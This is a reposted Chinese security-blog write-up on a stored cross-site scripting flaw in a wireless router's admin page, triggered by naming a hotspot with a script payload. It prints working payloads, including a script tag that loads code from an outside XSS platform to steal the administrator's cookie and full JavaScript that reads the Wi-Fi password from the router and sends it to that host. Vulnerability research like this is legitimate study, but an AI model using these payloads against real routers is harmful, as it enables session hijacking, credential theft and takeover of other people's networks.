首页 安全文摘 正文

骚姿势获取无线路由器后台权限

今天本想使用台式机上网,然而身边并没有有线接入点。于是乎,想到可以利用无线路由器的WISP功能正好从小伙伴那里蹭到了一个无线路由器,如下图所示:虽然丑但是好用哇,咱们登陆后台将路由器配置为无线信号放大模式emmmm,在选择无线信号名称这里我们发现了一个有意思的选项(扫描上级AP站点信息):扫描上级AP站点信息之后我们可以获取附近无线热点的一些简要信息,如SS

今天本想使用台式机上网,然而身边并没有有线接入点。于是乎,想到可以利用无线路由器的WISP功能

正好从小伙伴那里蹭到了一个无线路由器,如下图所示:


骚姿势获取无线路由器后台权限 安全文摘 安全文摘  第1张

虽然丑但是好用哇,咱们登陆后台将路由器配置为无线信号放大模式

骚姿势获取无线路由器后台权限 安全文摘 安全文摘  第2张

emmmm,在选择无线信号名称这里我们发现了一个有意思的选项(扫描上级AP站点信息):

骚姿势获取无线路由器后台权限 安全文摘 安全文摘  第3张

扫描上级AP站点信息之后我们可以获取附近无线热点的一些简要信息,如SSID、MAC等等,如下图所示:


骚姿势获取无线路由器后台权限 安全文摘 安全文摘  第4张

于是我们就想到这样一种攻击思路,是否可以生成一个无线热点,把名字修改为XSS Payload,是不是这样受害者在扫描附近AP信息的时候就会执行XSS

骚姿势获取无线路由器后台权限 安全文摘 安全文摘  第5张

emmm,我们先看看XSS注入点

骚姿势获取无线路由器后台权限 安全文摘 安全文摘  第6张

XSS注入点在元素内容处,我们可以直接使用<script>alert(1)</script>这类payload

使用手机生成一个热点名称为:%3d/><script>alert(1)</script>


骚姿势获取无线路由器后台权限 安全文摘 安全文摘  第7张

前面%3d/>没有用,只是为了方便以后测试。Emmm,居然没有任何过滤哈哈哈


骚姿势获取无线路由器后台权限 安全文摘 安全文摘  第8张

wink,光弹窗也不是回事呀,我们来试试获取管理员的cookie


骚姿势获取无线路由器后台权限 安全文摘 安全文摘  第9张

修改热点名称为:

<scriptsrc=http://xss.pt/ENRM></script>


再次扫描附近无线后,可以看到我们已经成功获得了被攻击者的Cookie

骚姿势获取无线路由器后台权限 安全文摘 安全文摘  第10张

emmm,作为攻击者现在我们可以登录路由器后台啦,但是我们还不知道无线密码是多少,我们来试试能不能通过JS读取Wi-Fi无线密码

首先我们先看看Wi-Fi密码存在什么位置


骚姿势获取无线路由器后台权限 安全文摘 安全文摘  第11张

虽然密码打*了,但是还是能读出来哒。我们不妨使用Burp抓包看看请求是怎样的


骚姿势获取无线路由器后台权限 安全文摘 安全文摘  第12张

简单抓包分析就可以知道我们只要请求该地址即可获取无线Wi-Fi密码:http://192.168.2.1/goform/wirelessGetSecurity

我们编写一段JS去请求这个这个地址,并将结果发送到我们的XSS平台代码如下:

var password = "nothing";var httpRequest = new XMLHttpRequest();    httpRequest.open('GET', 'http://192.168.2.1/goform/wirelessGetSecurity', true);    httpRequest.send();
    httpRequest.onreadystatechange = function () {if (httpRequest.readyState == 4 && httpRequest.status == 200) {            password = window.btoa(httpRequest.responseText);console.log(password);var sendPassword = new XMLHttpRequest();            sendPassword.open('GET', 'http://xss.pt/xss.php?do=api&id=ENRM&password='+ password, true);            sendPassword.send();        }    };

测试一下,可以看到console中已经打印出来密码信息


骚姿势获取无线路由器后台权限 安全文摘 安全文摘  第13张

通过抓包也可以看到请求已经发送至平台

骚姿势获取无线路由器后台权限 安全文摘 安全文摘  第14张nice

骚姿势获取无线路由器后台权限 安全文摘 安全文摘  第15张

解码后我们就得到了Wi-Fi密码

骚姿势获取无线路由器后台权限 安全文摘 安全文摘  第16张

emmmm,虽然我们最后拿到了相关权限,但是这个漏洞还是很鸡肋。因为必须要在目标附近创建热点,就算在附近、人家也不一定会点击扫描热点,就算点击了扫描热点、人家也不一定已经连网,这个漏洞需要的条件太苛刻

但是这个漏洞还是蛮有意思的.....如果有小伙伴有更好的利用思路,欢迎下方留言哇!

文章来源:重生信息安全

海报

本文转载自互联网,如有侵权,联系删除

转载请注明本文地址:https://heibai.org.cn/1701.html

相关推荐

从偶遇Flarum开始的RCE之旅

从偶遇Flarum开始的RCE之旅

事先声明:本次测试过程完全处于本地或授权环境,仅供学习与参考,不存在未授权测试过程,请读者勿使用该漏洞进行未授权测试,否则作者不承担任何...

WEB安全 2022-08-21 0 10406

2022年蓝队初级护网总结

2022年蓝队初级护网总结

一. 设备误报如何处理? 答:来自外网的误报说明安全设备需要进行策略升级,不需要处置。如果是来自内网的误报可以和负责人协商一下...

安全文摘 2022-08-21 0 10392

发布评论

ainiaobaibaibaibaobaobeishangbishibizuichiguachijingchongjingdahaqiandaliandangaodw_dogedw_erhadw_miaodw_tuzidw_xiongmaodw_zhutouganbeigeiliguiguolaiguzhanghahahahashoushihaixiuhanheixianhenghorse2huaixiaohuatonghuaxinhufenjiayoujiyankeaikeliankouzhaokukuloukunkuxiaolandelinileimuliwulxhainiolxhlikelxhqiuguanzhulxhtouxiaolxhwahahalxhzanningwennonuokpinganqianqiaoqinqinquantouruoshayanshengbingshiwangshuaishuijiaosikaostar0star2star3taikaixintanshoutianpingtouxiaotuwabiweifengweiquweiwuweixiaowenhaowoshouwuxiangjixianhuaxiaoerbuyuxiaokuxiaoxinxinxinxinsuixixixuyeyinxianyinyueyouhenghengyuebingyueliangyunzanzhajizhongguozanzhoumazhuakuangzuohenghengzuoyi
感谢您的支持